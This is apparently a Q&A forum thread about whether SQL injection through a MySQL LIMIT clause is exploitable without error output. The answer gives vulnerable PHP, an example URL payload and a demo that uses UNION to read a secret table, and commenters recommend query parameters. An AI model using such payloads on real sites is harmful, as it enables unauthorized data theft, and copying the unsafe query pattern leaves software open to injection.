LIMIT clause SQL injection without error output

Question

Let's assume we have got this query:

SELECT title FROM articles LIMIT 15

We are able to pass any string to the LIMIT clause, but the site does not output errors, in other words, when error occurs the site shows a blank page.

My question is, can attacker still proceed any kind of SQL injection? Maybe some time based injection with procedure_analyse?

Thanks in advance.

http://www.edwardl.xyz/2015/02/06/SQL%20Injections%20in%20MySQL%20LIMIT%20clause/ — Hadi, Dec 10 '17 at 22:14
I've tried the benchmark method, but it loaded immediately, so probably error was thrown immediately. — Tadeáš Jílek, Dec 10 '17 at 22:19
Are you unable to modify the source to sanitize the limit clause? what stack are you using? if php/mysql it might be worth reading https://stackoverflow.com/questions/10014147/limit-keyword-on-mysql-with-prepared-statement — geco17, Dec 10 '17 at 23:05
@WilliamBurnham he is not protecting his own site, he is breaking someone's else one. Or may be he's a wannabe pen-tester, but again, protection is not his concern. Otherwise he would have asked straight how to protect a LIMIT clause. From the protection point of view such a question (there is a security hole, I don't care to fix it, I only want to know how to exploit) makes no sense. — Your Common Sense, Dec 12 '17 at 08:24
No, actually a pentester has reported this bug he found on our site and wanted to get reward, which we offer to bug hunters. But he was not able to get data from databse, so i started testing by myself if i can get through. I just wanted to know if it’s exploitable, because in case it’s not, we wouldn’t pay him a penny, since nobody would be able to get anything from database. — Tadeáš Jílek, Dec 13 '17 at 09:14
Injection is injection. If you have not enough knowledge in SQL to exploit it, it doesn't mean someone else wouldn't have more knowledge and devise an exploit. — Your Common Sense, Dec 13 '17 at 15:12

Bill Karwin · Answer 1 · 2017-12-13T15:05:03.003

0

If there is an SQL injection vulnerability like this:

$UnsafeVariable = $_GET['param'];
$sql = "SELECT title FROM articles LIMIT $UnsafeVariable";

Then an example of SQL injection could be like::

http://mysite.example.com/page.php?param=0 UNION SELECT anything FROM anytable

It's common to use UNION to perpetrate SQL injection. I'm not revealing anything here you can't read on a site like https://owasp.org. You should try to do some reading.

Demo:

mysql> create table MyTable (id int primary key );

mysql> create table SecureTable (secret varchar(50));

mysql> insert into MyTable values (1), (2), (3);

mysql> insert into SecureTable values ('Alohomora');

mysql> select id from MyTable limit 
       /* now the part that is SQL injected */
       1 union select secret from SecureTable;
+-----------+
| id        |
+-----------+
| 1         |
| Alohomora |
+-----------+

edited Dec 13 '17 at 15:05

answered Dec 12 '17 at 05:51

Bill Karwin

538,548
86
673
828

You should try to do some research first, you cannot use union in/after LIMITY clause, look at SQL query structure. – Tadeáš Jílek Dec 13 '17 at 09:16
@TadeášJílek, see demo above, tested on MySQL 5.6.31. – Bill Karwin Dec 13 '17 at 15:05
This won't work in MySQL 5.7+ because now you cannot use `UNION` after `LIMIT` unless the whole query before `UNION` is surrounded in parenthesis. Something like `(SELECT * FROM table LIMIT 1) UNION SELECT ....`. – Mukarram Khalid Jul 06 '20 at 06:35
Thanks for that correction. Regardless, I think the usual advice is still best: **use query parameters**, then you don't have to wonder if it's safe from SQL injection in the current version of MySQL. – Bill Karwin Jul 06 '20 at 15:10

LIMIT clause SQL injection without error output

1 Answers1